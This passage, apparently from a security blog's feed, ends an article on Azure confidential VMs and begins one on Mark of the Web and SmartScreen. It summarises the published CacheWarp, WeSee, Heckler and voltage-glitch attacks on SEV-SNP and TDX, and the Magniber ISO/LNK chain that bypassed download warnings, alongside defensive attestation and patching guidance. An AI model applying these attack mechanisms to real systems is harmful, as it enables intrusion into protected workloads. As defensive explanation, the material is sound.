&lt;td&gt;Whole VM, container&lt;/td&gt;
&lt;td&gt;Whole VM&lt;/td&gt;
&lt;td&gt;Per enclave (up to 4 per host)&lt;/td&gt;
&lt;td&gt;Per pod / per container&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

flowchart LR
    Nitro[&quot;AWS Nitro Enclaves -- (parent-instance threat model)&quot;]
    Azure[&quot;Azure / GCP CVMs -- (cloud-operator threat model, -- whole VM)&quot;]
    CoCo[&quot;Confidential Containers -- (per pod / per container)&quot;]
    H100[&quot;NVIDIA H100 CC -- (CPU + GPU linked TEE)&quot;]
    Nitro --- Azure
    Azure --- CoCo
    CoCo --- H100
&lt;p&gt;If the contract is settled and the products ship, what is still wrong with this picture? Why do four published papers in 2024 demonstrate extracting secrets from a fully-patched SEV-SNP CVM?&lt;/p&gt;
&lt;h2&gt;8. Theoretical limits and the 2024 attack class&lt;/h2&gt;
&lt;p&gt;May 2, 2024. ETH Zurich&apos;s ZISC group publishes the Ahoi family of attacks. The lab&apos;s announcement is brisk: &quot;Researchers from the SECTRS group have now discovered a new class of attacks, dubbed Ahoi attacks, that exploit vulnerabilities in the notification framework in Intel TDX and AMD SEV-SNP. ... the vulnerabilities are tracked under 2 CVEs: CVE-2024-25744, CVE-2024-25743&quot; [@eth-ahoi-news] (with CVE-2024-25742 covering WeSee). WeSee won the Distinguished Paper Award at IEEE S&amp;amp;P 2024 [@ahoi-wesee]. Heckler appeared at USENIX Security 2024 [@heckler-usenix]. CISPA&apos;s CacheWarp, also at USENIX Security 2024, cross-cut both [@cachewarp-usenix].&lt;/p&gt;
&lt;p&gt;Four 2024-era papers attacking shipping confidential VMs, and a key observation: none of them broke the Generation-2 integrity rail itself. They all exploit seams &lt;em&gt;around&lt;/em&gt; it.&lt;/p&gt;
&lt;h3&gt;Trusted Computing Base accounting&lt;/h3&gt;
&lt;p&gt;The irreducible silicon-vendor trust root is non-zero by design. On SEV-SNP the customer must trust AMD-SP firmware and the ECDSA-P384 VCEK chain rooted at AMD. On TDX the customer must trust the signed TDX Module binary and the SGX-resident Quoting Enclave&apos;s signing root rooted at Intel. On Azure the customer additionally trusts Microsoft&apos;s signed OpenHCL binary -- with the consolation that OpenHCL is open source and reviewable [@openhcl-blog; @openvmm-repo]. The verifier (MAA, Intel Trust Authority, Google&apos;s verifier) is a separate trust component the relying party must extend.&lt;/p&gt;

The set of hardware, firmware, and software components whose correct operation is necessary for a system to enforce its security properties. For an Azure SEV-SNP CVM the TCB is the AMD silicon, the AMD-SP firmware, the OpenHCL paravisor binary, and Microsoft Azure Attestation acting as the verifier. The TCB cannot be empty; the goal is to make it small, auditable, and named [@amd-snp-whitepaper; @openhcl-blog].
&lt;p&gt;The lower bound on TCB is at least one signing root the customer cannot independently rebuild from public artefacts. Reproducible-build transparency over the AMD-SP firmware and the Intel TDX Module is one of the open standards problems on the 2026 frontier. The Google-Intel joint TDX security review from April 2023 is the best public substitute for a reproducible build of the TDX Module today [@gcp-tdx-review].&lt;/p&gt;
&lt;h3&gt;The 2024 attack class, in order of architectural depth&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;CacheWarp (USENIX Security 2024; CVE-2023-20592; AMD-SB-3005).&lt;/strong&gt; A software fault injection. The mechanism, in NVD&apos;s verbatim language: &quot;Improper or unexpected behavior of the INVD instruction in some AMD CPUs may allow an attacker with a malicious hypervisor to affect cache line write-back behavior of the CPU leading to a potential loss of guest virtual machine (VM) memory integrity&quot; [@nvd-cve-2023-20592]. The project page is plain: &quot;CacheWarp is a new software fault attack on AMD SEV-ES and SEV-SNP. It allows attackers to hijack control flow, break into encrypted VMs, and perform privilege escalation inside the VM&quot; [@cachewarp-site]. The CacheWarp authors -- Ruiyi Zhang, Lukas Gerlach, Daniel Weber, Lorenz Hetterich (CISPA), Youheng Lü (Independent), Andreas Kogler (Graz), Michael Schwarz (CISPA) -- demonstrated full RSA key recovery from Intel IPP, passwordless OpenSSH login, and &lt;code&gt;sudo&lt;/code&gt;-to-&lt;code&gt;root&lt;/code&gt; escalation [@cachewarp-usenix]. SEV-SNP is affected; the fix is the AMD microcode update tracked by AMD-SB-3005 [@amd-sb-3005].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;WeSee (IEEE S&amp;amp;P 2024 Distinguished Paper; CVE-2024-25742).&lt;/strong&gt; A malicious &lt;code&gt;#VC&lt;/code&gt; injection. The hypervisor coerces the guest&apos;s &lt;code&gt;#VC&lt;/code&gt; handler into doing the wrong thing by injecting a &lt;code&gt;#VC&lt;/code&gt; at a moment the guest does not expect one. The arXiv abstract is verbatim: &quot;We present WeSee attack, where the hypervisor injects malicious #VC into a victim VM&apos;s CPU to compromise the security guarantees of AMD SEV-SNP. ... WeSee can leak sensitive VM information (kTLS keys for NGINX), corrupt kernel data (firewall rules), and inject arbitrary code (launch a root shell from the kernel space)&quot; [@wesee-arxiv]. SEV-SNP only.The arXiv &lt;code&gt;citation_author&lt;/code&gt; metadata for 2404.03526 enumerates the WeSee co-authors as Schlueter, Sridhara, Bertschi, Shinde [@wesee-arxiv]. Earlier writeups, including some upstream pipeline stages of this article, listed the third co-author as &quot;Wilke.&quot; This was an inadvertent crossover from the SEVurity author list. The canonical author list, retrieved by querying the arXiv abstract page&apos;s &lt;code&gt;citation_author&lt;/code&gt; meta tags, names Andrin Bertschi (ETH Zurich), which matches the project page on &lt;code&gt;ahoi-attacks.github.io/wesee/&lt;/code&gt; [@ahoi-wesee]. This article reflects the corrected attribution.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Heckler (USENIX Security 2024; CVE-2024-25743, CVE-2024-25744).&lt;/strong&gt; A malicious non-timer interrupt injection. The hypervisor injects &lt;code&gt;int 0x80&lt;/code&gt; or a signal-mapped exception into the guest at a moment that breaks an invariant. The Ahoi Heckler page captures the scope: &quot;All Intel TDX and AMD SEV-SNP processors are vulnerable to Heckler&quot; [@ahoi-heckler]. The arXiv extended version demonstrates &quot;Heckler on OpenSSH and sudo to bypass authentication. On AMD SEV-SNP we break execution integrity of C, Java, and Julia applications that perform statistical and text analysis&quot; [@heckler-arxiv]. Mitigations are kernel-side interrupt filtering plus AMD&apos;s protected interrupt delivery feature.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Ahoi Attacks (umbrella).&lt;/strong&gt; The family page describes scope: &quot;Ahoi Attacks is a family of attacks on Hardware-based Trusted Execution Environments (TEEs) to break AMD SEV-SNP, Intel TDX and Intel SGX&quot; [@ahoi-site]. The ZISC news framing names the SECTRS group at ETH Zurich (Shweta Shinde&apos;s lab) as the locus [@eth-ahoi-news].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;One Glitch to Rule Them All (CCS 2021).&lt;/strong&gt; The physical-fault lower bound established in §3, included here for completeness. Buhren et al. voltage-glitched the AMD-SP on Zen 1 / 2 / 3 to execute custom payloads and to &quot;reverse-engineer the Versioned Chip Endorsement Key (VCEK) mechanism introduced with SEV Secure Nested Paging (SEV-SNP)&quot; [@one-glitch-arxiv]. With supplemental tooling on the PSPReverse GitHub artefact [@pspreverse-github]. With physical access and the right glitcher, the AMD-SP is breakable.&lt;/p&gt;

SEV cannot adequately protect confidential data in cloud environments from insider attackers, such as rogue administrators, on currently available CPUs. -- Buhren, Jacob, Krachenfels, Seifert, *One Glitch to Rule Them All*, 2021 [@one-glitch-arxiv]

flowchart TB
    INTG[&quot;Generation-2 integrity rail -- (RMP / PAMT)&quot;]
    INVD[&quot;CacheWarp -- CVE-2023-20592 -- INVD seam -- (SEV-ES, SEV-SNP)&quot;]
    VC[&quot;WeSee -- CVE-2024-25742 -- #VC handler seam -- (SEV-SNP)&quot;]
    INT[&quot;Heckler -- CVE-2024-25743/4 -- Interrupt-injection seam -- (SEV-SNP, TDX)&quot;]
    GLITCH[&quot;One Glitch -- Physical voltage-fault -- (AMD-SP firmware)&quot;]
    INTG -. &quot;intact&quot; .-&amp;gt; INVD
    INTG -. &quot;intact&quot; .-&amp;gt; VC
    INTG -. &quot;intact&quot; .-&amp;gt; INT
    INTG -. &quot;intact&quot; .-&amp;gt; GLITCH
&lt;h3&gt;Composition limits and operational corollaries&lt;/h3&gt;
&lt;p&gt;Can the verifier itself be a CVM? Can SKR survive a verifier compromise? These are open standards questions; the Confidential Computing Consortium is iterating on them and there is no settled answer. What there &lt;em&gt;is&lt;/em&gt; is operational guidance.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Every 2024-era SEV-SNP and TDX attack has a corresponding microcode or firmware update with a higher TCB SVN. Policies that accept &quot;any TCB SVN at or above the floor of last year&apos;s launch&quot; leave the door open to CacheWarp-class CPUs. Bind your MAA policy to &lt;code&gt;tcb_version &amp;gt;= latest_advisory&lt;/code&gt; and update the floor when AMD or Intel publishes a new security bulletin [@amd-sb-3005; @nvd-cve-2023-20592].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Confidential VMs do not promise side-channel resistance. They promise that the hypervisor cannot &lt;em&gt;directly read&lt;/em&gt; memory and that an integrity-broken page cannot be silently substituted. The current equilibrium against the 2024 attack class is patch-after-disclosure plus attestation-policy hygiene. That equilibrium is itself an architectural statement.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The 2024 attacks do not break the SEV-SNP or TDX integrity rail. They exploit seams &lt;em&gt;around&lt;/em&gt; the rail: the INVD instruction, the &lt;code&gt;#VC&lt;/code&gt; handler, the interrupt-injection path, and the physical AMD-SP. The architecture is settled. The residuals are the work.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The architecture is settled; the residuals are open. What is the 2026 research frontier actually working on?&lt;/p&gt;
&lt;h2&gt;9. Open problems&lt;/h2&gt;
&lt;p&gt;Six open problems shape the 2026 confidential-VM research frontier.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;OP1. Nested CVMs.&lt;/strong&gt; Intel TDX Module 1.5 ships TD Partitioning, where an L1 TD can host L2 TDs of its own [@intel-tdx-td-partitioning-354807]. AMD&apos;s analogue is the VMPL0 / VMPL2 layout that Azure OpenHCL already exploits. The portable cross-vendor formulation -- nested-CVM evidence that composes both vendors&apos; attestation reports into a single relying-party-checkable artefact -- is not yet standardised. Customers who want a verifier-inside-a-CVM design must build the composition themselves.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;OP2. Cross-vendor attestation composition for CPU+GPU CVMs.&lt;/strong&gt; Azure NCCadsH100v5 and GCP A3 already compose AMD or Intel CPU attestation with NVIDIA H100 GPU attestation in production. The relying party today consumes two separate evidence packages and runs two separate policy evaluations. The RATS working group&apos;s RFC 9711 (The Entity Attestation Token, EAT) [@rfc9711] is the canonical wire-format vocabulary -- a JWT- or CWT-encoded attested claims set -- that a Passport-topology verifier such as Microsoft Azure Attestation produces, and is the path to a single composed evidence package, but the cross-vendor standards work is unsettled.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;OP3. Transparency and reproducible builds of the AMD-SP firmware and the Intel TDX Module.&lt;/strong&gt; Both are signed binaries customers trust but do not build. Google&apos;s April 2023 joint security review of TDX, authored by Erdem Aktas, Cfir Cohen, Josh Eads (Google Cloud Security), James Forshaw, and Felix Wilhelm (Google Project Zero), enumerated specific vulnerabilities including &quot;Non-Persistent SEAM Loader, Exit Path Interrupt Hijacking, Unsafe Performance Monitoring VMCS Configuration&quot; [@gcp-tdx-review]. That review is the closest thing to public auditability the TDX Module has today. A reproducible build with binary transparency log (rekor-style) would close the residual auditability gap that even open-source OpenHCL leaves on the table for the silicon vendor&apos;s firmware.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;OP4. Post-quantum attestation signatures.&lt;/strong&gt; SNP_REPORT signs with ECDSA-P384. TD Quotes are Intel-signed with RSA / ECDSA. The NIST FIPS 204 (ML-DSA) and FIPS 205 (SLH-DSA) standards are final, but vendor-side migration of the CVM signing roots has not been announced for either AMD or Intel. The deployment-feasible path is dual-signing: the SNP_REPORT or TD Quote carries both an ECDSA signature and an ML-DSA signature, the verifier accepts either, and the relying party gates on whichever signing root it trusts most. The transition is non-trivial because the VCEK derivation itself uses a classical KDF chain rooted in classical entropy.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;OP5. Side-channel-resistant CVMs at deployment scale.&lt;/strong&gt; The CacheWarp, WeSee, Heckler, and Ahoi family is the &lt;em&gt;active&lt;/em&gt; frontier. The current operational equilibrium is policy-pinning to the latest TCB SVN plus microcode-update discipline. There is no production CVM architecture that promises constant-time execution across the integrity rail or that closes the cache-side and notification-injection seams at the silicon layer. The 2026 frontier is what &lt;em&gt;architectural&lt;/em&gt; mitigations look like, not what microcode patches catch up to.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;OP6. Confidential container portability after AKS KataCcIsolation sunset (March 2026).&lt;/strong&gt; The Azure CoCo surface fragments into ACI per-pod CVM, ARO per-container CVM, AKS Confidential VM node pools at node granularity, and the upstream CoCo project [@msdocs-aks-confidential-containers]. Customers picking a confidential-containers strategy today need to plan for one of those four routes; the CoCo project itself is Linux-only as of 2026-05. Windows confidential containers remain out of scope on every shipping cloud.&lt;/p&gt;

This article does not deep-cover Intel SGX (the sibling enclave article handles that), ARM Confidential Compute Architecture (CCA) or Apple&apos;s Secure Enclave Processor (different threat models and form factors), the full text of the TDX Module Architecture Specification (it is 285 pages [@intel-tdx-spec-344425]; this article cites the load-bearing parts), the regulatory and sovereign-cloud framing of CVMs (a separate topic), or the application-level patterns for designing a customer service to be SKR-aware (an operations topic for a future post).

flowchart LR
    OP1[&quot;OP1 -- Nested CVMs -- (TD Part. / VMPL)&quot;]
    OP2[&quot;OP2 -- Cross-vendor -- attestation composition&quot;]
    OP3[&quot;OP3 -- Firmware transparency -- + reproducible build&quot;]
    OP4[&quot;OP4 -- PQ signatures -- (ML-DSA / SLH-DSA)&quot;]
    OP5[&quot;OP5 -- Side-channel- -- resistant CVMs&quot;]
    OP6[&quot;OP6 -- CoCo portability -- (post-March-2026)&quot;]
    OP1 --- OP2
    OP3 --- OP4
    OP5 --- OP6
&lt;p&gt;If you are deploying today, what should you do this quarter? The next section is a practical walk-through that ties the architecture to a runnable workflow.&lt;/p&gt;
&lt;h2&gt;10. Practical guide: VBS-inside-CVM end-to-end&lt;/h2&gt;
&lt;p&gt;Six steps move you from a credit-card swipe to a Windows Server CVM that runs an attested workload with HSM-backed key release. Treat the list as a checklist; each step is a place where the architecture from the previous sections becomes operational.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Step 1. Provision the CVM.&lt;/strong&gt; Pick a SEV-SNP SKU (DCasv5 or DCasv6 preview), a supported Windows Server image (2019, 2022, or 2025), and turn on Confidential OS-disk encryption with a customer-managed key in Azure Key Vault or Managed HSM. Bind the key to an MAA-aware release policy. The Learn CVM overview describes the SKU family and the OS-image support [@msdocs-azure-cvm]. Plan for the March 30, 2026 encrypted-OS-disk pricing change [@msdocs-azure-cvm].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Step 2. Confirm VBS inside the CVM.&lt;/strong&gt; A common misconception is that turning on SEV-SNP makes Virtualization-Based Security redundant. It does not -- VMPL and VTL are orthogonal. From an elevated PowerShell session:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; &lt;code&gt;Get-CimInstance -Namespace Root\Microsoft\Windows\DeviceGuard -ClassName Win32_DeviceGuard&lt;/code&gt; should return &lt;code&gt;VirtualizationBasedSecurityStatus = 2&lt;/code&gt; (running) and a non-empty &lt;code&gt;SecurityServicesRunning&lt;/code&gt; array that includes Credential Guard and HVCI. This proves that VTL1 / VTL0 separation is intact inside the SEV-SNP trust boundary -- the cloud operator is excluded by VMPL, and the customer&apos;s own user mode and ring-0 are excluded from the Secure Kernel by VTL.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;Step 3. Capture an attestation token and walk it by hand.&lt;/strong&gt; Use the Azure Attestation client (&lt;code&gt;Microsoft.Azure.Attestation&lt;/code&gt;) to send the guest&apos;s SNP_REPORT and vTPM quote to the regional MAA endpoint. Inspect the returned JWT. The decoded claim set will include &lt;code&gt;x-ms-isolation-tee&lt;/code&gt; describing the TEE (SEV-SNP or TDX), &lt;code&gt;x-ms-runtime&lt;/code&gt; describing the guest configuration, the boot measurements, and any custom claims your policy mints. Verify the JWT signature against the region&apos;s MAA signing certificate -- not against an arbitrary trusted root; this is the verifier-identity hygiene that closes the SKR loop.&lt;/p&gt;

A valid MAA JWT will contain `x-ms-attestation-type = sevsnpvm` (or `tdxvm`) and a `x-ms-compliance-status = azure-compliant-cvm` claim. If either is missing or has a different value, the policy did not gate on the TEE and the relying party is about to release a key against unattested evidence.
&lt;p&gt;&lt;strong&gt;Step 4. Author the policy.&lt;/strong&gt; Write an MAA policy v1.2 file with four pieces. A configuration-rules block that keeps the defaults: &lt;code&gt;require_valid_aik_cert=true&lt;/code&gt; and &lt;code&gt;required_pcr_mask=0xFFFFFF&lt;/code&gt; [@maa-policy-v12]. An authorization-rules block that requires (a) &lt;code&gt;x-ms-attestation-type == &quot;sevsnpvm&quot;&lt;/code&gt;, (b) the SNP_REPORT measurement matches a known reference value for the customer&apos;s golden image, (c) the vTPM PCR-7 matches a known Secure Boot signer baseline, and (d) the VBS-enabled claim is &lt;code&gt;true&lt;/code&gt;. An issuance-rules block that mints a &lt;code&gt;customer-workload-tier&lt;/code&gt; claim from the SNP_REPORT&apos;s &lt;code&gt;tcb_version&lt;/code&gt;. And version &lt;code&gt;1.2&lt;/code&gt;. Bind your HSM key&apos;s release policy to require the issuance-rule claim plus the authorization-rule pass.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Use &lt;code&gt;az attestation policy set&lt;/code&gt; to upload the policy to a non-production attestation provider and replay captured evidence through &lt;code&gt;attestationProvider&lt;/code&gt; REST endpoints. This lets you iterate on JmesPath claim rules without rebooting CVMs. Pre-production failures here are cheap; failures after SKR binding are expensive [@maa-policy-v12].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;Step 5. Repeat on a TDX SKU.&lt;/strong&gt; Provision a DCesv5 or DCesv6 (preview) CVM. The attestation evidence shape changes: TDX evidence carries &lt;code&gt;MRTD&lt;/code&gt; plus &lt;code&gt;RTMR0-3&lt;/code&gt; instead of a single SNP measurement, and the claims JSON shape differs. The JmesPath rules in your policy must be parameterised on &lt;code&gt;productId&lt;/code&gt; to handle both TEEs from one policy file, or split into two policy files keyed by attestation provider region and TEE type [@intel-tdx-overview; @maa-policy-v12].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Step 6. Plan TCB SVN hygiene.&lt;/strong&gt; Treat the TCB SVN floor in your policy as a moving target, not a one-time configuration. Subscribe to the AMD security bulletins and the Intel TDX security advisories. When CacheWarp&apos;s microcode shipped via AMD-SB-3005 [@amd-sb-3005], the appropriate operational response was to raise the policy&apos;s TCB SVN floor to the new microcode level, not to leave the floor at the launch baseline. This is the single most important operational habit a CVM customer can adopt.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; A policy that accepts the launch-baseline TCB SVN forever is a policy that grandfathers in every known CVE the silicon vendor has shipped a microcode patch for. The 2024 attack class makes this a load-bearing operational discipline, not a footnote [@nvd-cve-2023-20592; @amd-sb-3005].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;You can build it today. The FAQ below answers the questions readers most often ask after they have built it.&lt;/p&gt;
&lt;h2&gt;11. FAQ and closing&lt;/h2&gt;


Architecturally, the host hypervisor cannot read your encrypted RAM and cannot silently remap pages without triggering an RMP or PAMT fault [@amd-sev-portal; @intel-tdx-overview]. Operationally, the verifier (Microsoft Azure Attestation) is run by Microsoft, the paravisor (OpenHCL) is built by Microsoft, and the silicon is signed by AMD or Intel. You must still trust those components. The lower bound on TCB is at least the silicon vendor&apos;s signing root plus at least one verifier; you can shrink the *verifier* trust by using a third party (Intel Trust Authority for TDX, or your own deployment of an attestation broker), but you cannot shrink the silicon-vendor root [@msdocs-maa-overview].


No. VMPL (the SEV-SNP privilege axis) and VTL (the in-guest Virtualization-Based Security axis) are orthogonal -- VMPL gates the *operator*; VTL gates the *guest kernel*. See §6 for the full two-axis treatment; a Windows Server CVM should run with VBS, HVCI, and Credential Guard enabled inside the guest exactly as it would outside a CVM [@msdocs-azure-cvm].


No. The Nitro hypervisor enforces the enclave boundary in software AWS owns and operates; there is no CPU-level memory cipher, and the threat model is parent-instance isolation rather than cloud-operator isolation. See §7 for the three architectural differences and the operator-trustless callout [@aws-nitro-enclaves].


Yes, with limits. The attestation surface changes: the SNP_REPORT measurement (or MRTD plus RTMR extensions on TDX) now reflects your custom image. Your MAA policy must whitelist the new measurement values or use issuance-rule projection to bind to attributes you control. You cannot bypass the paravisor without abandoning the OpenHCL-mediated vTPM, which removes the chained vTPM-quote to silicon path most customers depend on [@msdocs-azure-cvm; @openhcl-blog].


Yes -- transitively, through the paravisor. See §6 for the full `vTPM quote -&amp;gt; EK certificate -&amp;gt; SNP_REPORT or TD Quote -&amp;gt; VCEK or Intel signing root` chain, and read it end-to-end before you accept a vTPM quote as silicon-bound [@msdocs-azure-cvm].


Node-granularity CVM versus per-pod CVM. Confidential VM AKS node pools put each worker node inside an SEV-SNP CVM; all pods on that node share the trust boundary [@msdocs-aks-cvm-nodes]. Confidential Containers on AKS used the `KataCcIsolation` runtime to put each pod inside its own SEV-SNP-backed Kata MicroVM; that preview is sunsetting in March 2026 [@msdocs-aks-confidential-containers]. Different SKUs, different runtimes, different sunset timelines. Pick node-granularity for lift-and-shift; pick per-pod when you need stricter blast-radius isolation between pods on the same hardware.


No. See §8 for the architectural finding (the Generation-2 integrity rail remains intact under all four 2024 papers; each attack exploits a seam *around* the rail) and §10 Step 6 for the TCB-SVN-pinning operational habit that translates the finding into deployment policy [@cachewarp-site; @ahoi-heckler; @amd-sb-3005].

&lt;p&gt;Imagine drawing the architecture from memory. Start at the bottom with AMD silicon plus the AMD-SP firmware, or Intel silicon plus the SEAM Range Register and the signed TDX Module. Above that, the Azure Hyper-V host -- below the trust boundary, blind to encrypted RAM. Above that, the OpenHCL paravisor at VMPL0 or the L1 TD seat, mediating synthetic devices and the vTPM. Above that, the Windows Server guest at VMPL2 or the L2 TD, still running VBS, HVCI, and Credential Guard inside. Then evidence flows up: SNP_REPORT or TD Quote plus vTPM quote into Microsoft Azure Attestation, which evaluates policy v1.2 against the evidence and emits a signed JWT, which Azure Key Vault checks before releasing the wrapped OS-disk key. If you can draw it on a napkin in two minutes, you have understood the article. If you can write the MAA policy that says exactly what you mean by &quot;this VM is one of mine,&quot; you can build with it.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;confidential-vms-on-azure&quot; keyTerms={[
  { term: &quot;Reverse Map Table (RMP)&quot;, definition: &quot;AMD SEV-SNP per-page metadata table enforcing GPA-to-HPA binding; mismatched mappings raise #NPF(rmpfault).&quot; },
  { term: &quot;Virtual Machine Privilege Level (VMPL)&quot;, definition: &quot;AMD SEV-SNP four-level privilege lattice; OpenHCL paravisor at VMPL0, customer kernel at VMPL2.&quot; },
  { term: &quot;SNP_REPORT&quot;, definition: &quot;ECDSA-P384 signed attestation report from the AMD-SP, carrying measurement, policy, report_data, vmpl, chip_id, tcb_version.&quot; },
  { term: &quot;Secure Arbitration Mode (SEAM)&quot;, definition: &quot;Intel CPU privilege state in which the signed TDX Module executes, hosted in the SEAMRR memory range.&quot; },
  { term: &quot;Intel TDX Module&quot;, definition: &quot;Signed Intel firmware running in SEAM that mediates entry, exit, and measurement for Trust Domains.&quot; },
  { term: &quot;MRTD&quot;, definition: &quot;Build-time TDX measurement of the initial TD image; SEAM analogue of an immutable launch PCR.&quot; },
  { term: &quot;RTMR0-3&quot;, definition: &quot;Runtime extendable measurement registers exposed by the TDX Module; SEAM analogue of the runtime-extension TPM PCRs. Canonical TDX-vTPM mapping: RTMR[0]&amp;lt;-&amp;gt;PCR[1,7], RTMR[1]&amp;lt;-&amp;gt;PCR[2-6], RTMR[2]&amp;lt;-&amp;gt;PCR[8-9], RTMR[3]&amp;lt;-&amp;gt;PCR[14,17-22].&quot; },
  { term: &quot;OpenHCL paravisor&quot;, definition: &quot;Microsoft&apos;s open-source Rust paravisor on OpenVMM, running inside the CVM trust boundary at VMPL0 or the L1 TD seat.&quot; },
  { term: &quot;Microsoft Azure Attestation (MAA)&quot;, definition: &quot;Azure&apos;s RATS verifier; evaluates customer policy v1.2 against SNP_REPORT or TD Quote plus vTPM evidence and returns a signed JWT.&quot; },
  { term: &quot;Secure Key Release (SKR)&quot;, definition: &quot;Azure Key Vault / Managed HSM operation gating wrapped-key release on a valid MAA attestation token.&quot; },
  { term: &quot;Versioned Chip Endorsement Key (VCEK)&quot;, definition: &quot;AMD per-chip per-TCB-version ECDSA-P384 signing key for SNP_REPORTs; certificate chain anchors to AMD root via the ASK.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>confidential-computing</category><category>sev-snp</category><category>intel-tdx</category><category>azure</category><category>attestation</category><category>paravisor</category><category>windows-security</category><category>tee</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>Mark of the Web, SmartScreen, and the Catalog of Trust: How Windows Decides Whether to Warn You</title><link>https://paragmali.com/blog/mark-of-the-web-smartscreen-catalog-of-trust/</link><guid isPermaLink="true">https://paragmali.com/blog/mark-of-the-web-smartscreen-catalog-of-trust/</guid><description>How Windows stacks three trust layers -- origin, reputation, and signed catalog -- and why the 2022-2024 SmartScreen bypass arc was always a propagation bug, never a cryptography bug.</description><pubDate>Wed, 13 May 2026 00:00:00 GMT</pubDate><content:encoded>
Windows decides whether a file is safe to run by stacking three independent trust signals: **Mark of the Web** (an NTFS alternate data stream tagging where the file came from), **SmartScreen Application Reputation** (a cloud lookup against Microsoft&apos;s file-and-publisher telemetry), and **Authenticode catalog files** (PKCS#7 containers that vouch for the hashes of in-box and driver binaries). The 2022-2024 bypass arc -- seven Security Feature Bypass advisories from Magniber&apos;s malformed-Authenticode ransomware to Elastic&apos;s LNK-stomping disclosure -- proved that every break is a *propagation* or *parser* failure, never a cryptographic one. Smart App Control on Windows 11 22H2+ is Microsoft&apos;s synthesis: a code-integrity policy gated by the same reputation oracle SmartScreen uses, fail-closed by construction. Except it silently disables itself on devices whose telemetry suggests the user would override it anyway.
&lt;h2&gt;1. A Double-Click That Should Have Warned You&lt;/h2&gt;
&lt;p&gt;It is October 2022. A user receives an email that looks like a shipping notice from a familiar vendor. They click the attachment, which is a &lt;code&gt;.iso&lt;/code&gt; file. Microsoft Edge dutifully saves the download to disk and writes Mark of the Web onto it. They double-click the ISO. Windows Explorer mounts it as a virtual drive letter. They double-click a &lt;code&gt;.lnk&lt;/code&gt; file inside. A JScript payload runs. Magniber ransomware encrypts their files.&lt;/p&gt;
&lt;p&gt;The Attachment Execution Service was registered. SmartScreen was enabled. Microsoft Defender was up to date. &lt;em&gt;Nothing warned them.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;A few weeks later this would be catalogued as CVE-2022-41091 [@nvd-nist-gov-2022-41091] and patched on Microsoft&apos;s November 2022 Patch Tuesday, the same day CISA added it to the Known Exploited Vulnerabilities catalog [@cisa-gov-vulnerabilities-catalog]. The root cause was small enough to fit in a sentence: when Explorer mounted the ISO as a virtual drive, the files visible through that mount inherited &lt;em&gt;no&lt;/em&gt; &lt;code&gt;Zone.Identifier&lt;/code&gt; alternate data stream from the parent container, so the Attachment Execution Service had nothing to react to and SmartScreen was never invoked. The trust chain broke at a propagator, not at a cipher.&lt;/p&gt;

sequenceDiagram
    participant User
    participant Edge
    participant Explorer
    participant ISOmount as ISO mount
    participant LNK
    participant JScript
    participant AES as Attachment Execution Service
    participant SS as SmartScreen
    User-&amp;gt;&amp;gt;Edge: Click email attachment
    Edge-&amp;gt;&amp;gt;Edge: Save .iso, write Zone.Identifier ADS
    Edge-&amp;gt;&amp;gt;SS: Reputation check on .iso
    SS--&amp;gt;&amp;gt;Edge: Unknown, two-stage prompt
    User-&amp;gt;&amp;gt;Explorer: Double-click .iso
    Explorer-&amp;gt;&amp;gt;ISOmount: Mount as virtual drive
    Note over ISOmount: MOTW NOT propagated to mounted files (CVE-2022-41091)
    User-&amp;gt;&amp;gt;LNK: Double-click .lnk inside mount
    LNK-&amp;gt;&amp;gt;AES: launch target
    AES--&amp;gt;&amp;gt;AES: No Zone.Identifier present
    Note over AES,SS: SmartScreen NEVER invoked
    AES-&amp;gt;&amp;gt;JScript: Run payload
    JScript-&amp;gt;&amp;gt;User: Magniber encrypts files
&lt;p&gt;The point of this article is that the Magniber chain is one of seven Security Feature Bypass advisories in a two-year arc that together describe how Windows answers a deceptively simple question: &lt;em&gt;is it safe to run this file?&lt;/em&gt; The answer, when you take it apart, is three independent decisions stacked on top of each other. The first decision asks the file system &lt;em&gt;where did this come from?&lt;/em&gt; and is answered by Mark of the Web. The second decision asks the cloud &lt;em&gt;what does the world think of this?&lt;/em&gt; and is answered by SmartScreen Application Reputation. The third decision asks a signed catalog &lt;em&gt;is this file&apos;s hash vouched for by a publisher Microsoft trusts?&lt;/em&gt; and is answered by Authenticode and the catalog files in &lt;code&gt;CatRoot&lt;/code&gt;.&lt;/p&gt;

